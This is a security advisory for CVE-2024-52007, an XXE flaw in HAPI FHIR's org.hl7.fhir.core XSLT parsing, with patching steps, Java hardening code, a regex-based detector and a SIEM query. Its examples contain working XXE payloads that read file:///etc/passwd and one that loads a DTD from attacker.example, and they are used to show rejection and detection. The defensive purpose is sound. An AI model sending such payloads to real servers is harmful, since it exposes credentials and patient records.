CVE-2024-52007
📋 TL;DR
This CVE describes an XML External Entity (XXE) vulnerability (CWE-611) in the XSLT parsing components of org.hl7.fhir.core, the HL7 FHIR core library used by HAPI FHIR. An attacker who can get a vulnerable deployment to parse a crafted XML document through that path can declare an external entity that resolves to a local file and thereby read arbitrary files readable by the application process. This affects systems where external clients can submit XML to HAPI FHIR implementations.
💻 Affected Systems
- HAPI FHIR (org.hl7.fhir.core)
⚠️ Manual Verification Required
The NVD record for this CVE carries no affected-version range, so automated detection that relies on that data alone cannot determine whether your system is affected.
Why? The NVD entry doesn't specify which versions are vulnerable (no version ranges provided). The GitHub advisory linked under Official Fix below does: the fix shipped in org.hl7.fhir.core 6.4.0, so treat any earlier version as affected.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Disclosure of any file readable by the JVM process, such as /etc/passwd, SSH keys, configuration files, or database credentials, which an attacker can then use for lateral movement and data exfiltration. As with any XXE, the parser can also be made to fetch URLs from the server's network position (SSRF), reaching internal services that are not exposed externally.
Likely Case
Unauthorized reading of files available to the application process: credentials, configuration data, or, on healthcare systems, protected health information (PHI) stored on disk.
If Mitigated
Limited impact with proper network segmentation, input validation, and XML parser hardening preventing successful exploitation.
🎯 Exploit Status
Exploitation requires the ability to get a vulnerable deployment to parse attacker-supplied XML through the XSLT path. No public exploit code is known, but XXE payloads are generic (a DOCTYPE declaring an external entity that points at a file: URL, then a reference to that entity in the document body), so the vulnerability is straightforward to exploit once a reachable entry point is found.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.4.0
Vendor Advisory: https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-6cr6-ph3p-f5rf
Restart Required: Yes
Instructions:
1. Identify all HAPI FHIR deployments.
2. Check the current version using dependency management tools.
3. Update the org.hl7.fhir.core dependency to version 6.4.0 or later. If it arrives transitively through HAPI FHIR, upgrade HAPI FHIR to a release that pulls in 6.4.0 or later, or override the transitive version explicitly.
4. Rebuild and redeploy applications.
5. Restart affected services.
🧯 If You Can't Patch
- Implement strict input validation at the application boundary to reject XML containing a DOCTYPE declaration or entity references; FHIR resources never need a DTD, so there is no legitimate traffic to lose.
- Harden the JAXP parsers that feed the XSLT path in your own code: enable FEATURE_SECURE_PROCESSING and set ACCESS_EXTERNAL_DTD and ACCESS_EXTERNAL_STYLESHEET to the empty string, as described in the OWASP XXE prevention cheat sheet linked under References.
- Deploy network-level controls to restrict XML submission to trusted sources only and add WAF rules for XXE patterns, treating the WAF as defence in depth: signature rules can be evaded with alternative encodings, so they do not replace the patch.
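As an added example (not code from HAPI FHIR or org.hl7.fhir.core), this is the JAXP hardening from the OWASP cheat sheet linked under References applied to a complete XSLT transform: the TransformerFactory is barred from external DTD and stylesheet access, and both the stylesheet and the untrusted document are read through a SAX reader that rejects any DOCTYPE. The class name, the stylesheet and the Patient documents are constructed for the demonstration and are not FHIR-conformant; the XXE payload is the classic file-disclosure entity.

```java
import java.io.StringReader;
import java.io.StringWriter;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.sax.SAXSource;
import javax.xml.transform.stream.StreamResult;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;

/** Added example (not HAPI FHIR / org.hl7.fhir.core code): an XSLT transform hardened against XXE. */
public final class HardenedXslt {

    /** TransformerFactory that is barred from fetching external DTDs and stylesheets (OWASP JAXP guidance). */
    static TransformerFactory hardenedTransformerFactory() throws TransformerException {
        TransformerFactory tf = TransformerFactory.newInstance();
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);   // entity/expansion limits
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");          // "" = no protocol allowed
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return tf;
    }

    /** SAX reader that rejects any DOCTYPE, so no entity declaration is ever processed. */
    static XMLReader hardenedReader() throws ParserConfigurationException, SAXException {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        return spf.newSAXParser().getXMLReader();
    }

    /** Runs the stylesheet over untrusted XML; both documents are read only through the hardened reader. */
    static String transform(String stylesheet, String untrustedXml) throws Exception {
        Transformer t = hardenedTransformerFactory().newTransformer(
                new SAXSource(hardenedReader(), new InputSource(new StringReader(stylesheet))));
        StringWriter out = new StringWriter();
        t.transform(new SAXSource(hardenedReader(), new InputSource(new StringReader(untrustedXml))),
                    new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed stylesheet: emits the text of /Patient/name (not FHIR-conformant, kept minimal).
        String xsl = "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
                + "<xsl:output method=\"text\"/>"
                + "<xsl:template match=\"/\"><xsl:value-of select=\"/Patient/name\"/></xsl:template>"
                + "</xsl:stylesheet>";

        // Constructed benign document.
        String benign = "<Patient><name>Jane Doe</name></Patient>";
        System.out.println("benign -> " + transform(xsl, benign));

        // Constructed XXE payload: an external general entity pointing at a local file.
        String xxe = "<!DOCTYPE Patient [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>"
                + "<Patient><name>&xxe;</name></Patient>";
        try {
            System.out.println("xxe    -> " + transform(xsl, xxe));
        } catch (TransformerException e) {
            // disallow-doctype-decl makes the reader fail before any entity could be resolved.
            System.out.println("xxe    -> rejected: " + e.getMessage());
        }
    }
}
```

Compile and run with `javac HardenedXslt.java && java HardenedXslt`; it uses only the JDK's built-in Xalan and Xerces and needs no HAPI dependency. The benign document is transformed, while the XXE document is rejected by the SAX reader before the file: entity is ever resolved. Note the limit of this approach: it hardens XSLT code in your own application, but it does not reach into the parser org.hl7.fhir.core creates internally, so for the library itself the fix remains the upgrade to 6.4.0.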
🔍 How to Verify
Check if Vulnerable:
Check Maven/Gradle dependencies for org.hl7.fhir.core artifacts at version <6.4.0. The library is published as several artifacts under the ca.uhn.hapi.fhir groupId (org.hl7.fhir.utilities, org.hl7.fhir.r4, org.hl7.fhir.r5, org.hl7.fhir.validation and others) that share one version number, and HAPI FHIR pulls them in transitively, so inspect the resolved dependency tree rather than only the versions you declare. Review application code for XSLT parsing of external XML input.
Check Version:
mvn dependency:tree | grep org.hl7.fhir
./gradlew dependencies | grep org.hl7.fhir
Verify Fix Applied:
Verify that every org.hl7.fhir.* artifact in the resolved tree is version 6.4.0 or higher, not just that pom.xml or build.gradle declares 6.4.0; a transitive dependency from an older HAPI FHIR release can still pin an earlier version.
📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors, large XML file submissions, requests containing DOCTYPE or SYSTEM entity declarations in XML payloads.
Network Indicators:
- HTTP POST/PUT requests carrying XML (Content-Type application/fhir+xml or text/xml) to FHIR endpoints from unexpected sources; outbound HTTP or FTP connections initiated by the application process while handling a request, which a FHIR server has no reason to make when parsing input; unusual file reads by the application process.
SIEM Query:
source="application_logs" AND (message="*<!DOCTYPE*" OR message="*<!ENTITY*" OR message="*disallow-doctype-decl*")
This only fires if request bodies or XML parser error messages reach the logs. Match on the markup (`<!DOCTYPE`, `<!ENTITY`) rather than the bare word ENTITY, which also matches exception class names such as EntityNotFoundException; the third term is the Xerces error text emitted when a hardened parser rejects a DOCTYPE.
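The DOCTYPE rejection from the mitigation list and the log indicators above share one piece of logic, given here as an added example that is not part of the page or of HAPI FHIR: a classifier that separates a bare DOCTYPE (never needed in FHIR, worth rejecting but low severity) from a DOCTYPE with an external subset or an external entity declaration (the XXE pattern), and that ignores the word "entity" in ordinary error text. The class name, the log format and the log lines are constructed for the demonstration.

```java
import java.util.List;
import java.util.regex.Pattern;

/** Added example (not HAPI FHIR code): classify XML bodies or logged requests for XXE-shaped constructs. */
public final class XxePatternCheck {

    enum Verdict { CLEAN, DOCTYPE_ONLY, XXE_SUSPECTED }

    // DOCTYPE that references an external subset or opens an internal subset.
    private static final Pattern DOCTYPE_WITH_SUBSET = Pattern.compile(
            "<!DOCTYPE\\s+[^\\s>\\[]+\\s*(SYSTEM|PUBLIC|\\[)", Pattern.CASE_INSENSITIVE);
    // Entity declaration (general, or parameter via the optional %) that resolves an external resource.
    private static final Pattern EXTERNAL_ENTITY = Pattern.compile(
            "<!ENTITY\\s+(%\\s*)?[^\\s>]+\\s+(SYSTEM|PUBLIC)\\b", Pattern.CASE_INSENSITIVE);
    // Any DOCTYPE at all: FHIR payloads never need one, so it is worth rejecting even without a subset.
    private static final Pattern ANY_DOCTYPE = Pattern.compile("<!DOCTYPE\\b", Pattern.CASE_INSENSITIVE);

    /** Most severe verdict for one decoded XML body or one logged request line. */
    static Verdict classify(String text) {
        if (EXTERNAL_ENTITY.matcher(text).find() || DOCTYPE_WITH_SUBSET.matcher(text).find()) {
            return Verdict.XXE_SUSPECTED;
        }
        if (ANY_DOCTYPE.matcher(text).find()) {
            return Verdict.DOCTYPE_ONLY;
        }
        return Verdict.CLEAN;
    }

    /** Gateway policy from the mitigation list: only CLEAN bodies are forwarded to the FHIR endpoint. */
    static boolean shouldForward(String body) {
        return classify(body) == Verdict.CLEAN;
    }

    public static void main(String[] args) {
        // Constructed request-log lines in a hypothetical "timestamp method path body=..." format.
        List<String> logLines = List.of(
            "2024-11-20T10:01:02Z POST /fhir/Patient body=<Patient xmlns=\"http://hl7.org/fhir\"><id value=\"1\"/></Patient>",
            "2024-11-20T10:01:05Z POST /fhir/Patient body=<!DOCTYPE Patient [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><Patient>&xxe;</Patient>",
            "2024-11-20T10:01:09Z POST /fhir/Patient body=<!DOCTYPE Patient SYSTEM \"http://attacker.example/evil.dtd\"><Patient/>",
            "2024-11-20T10:01:12Z POST /fhir/Patient body=<!DOCTYPE Patient><Patient/>",
            "2024-11-20T10:01:15Z GET  /fhir/Patient/1 status=404 message=EntityNotFoundException: Patient/1");
        for (String line : logLines) {
            System.out.printf("%-14s %s%n", classify(line), line);
        }
    }
}
```

Run the classifier on text that has already been decoded the way the XML parser would decode it: a body sent as UTF-16, or with a charset declared in the prolog that differs from the transport encoding, will not match byte-level or naive string patterns. That is why this check is defence in depth for the gateway and the SIEM, and the parser-level hardening and the upgrade to 6.4.0 remain the controls that actually close the hole.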
🔗 References
- https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#jaxp-documentbuilderfactory-saxparserfactory-and-dom4j
- https://cwe.mitre.org/data/definitions/611.html
- https://github.com/hapifhir/org.hl7.fhir.core/issues/1571
- https://github.com/hapifhir/org.hl7.fhir.core/pull/1717
- https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-6cr6-ph3p-f5rf
- https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-gr3c-q7xf-47vh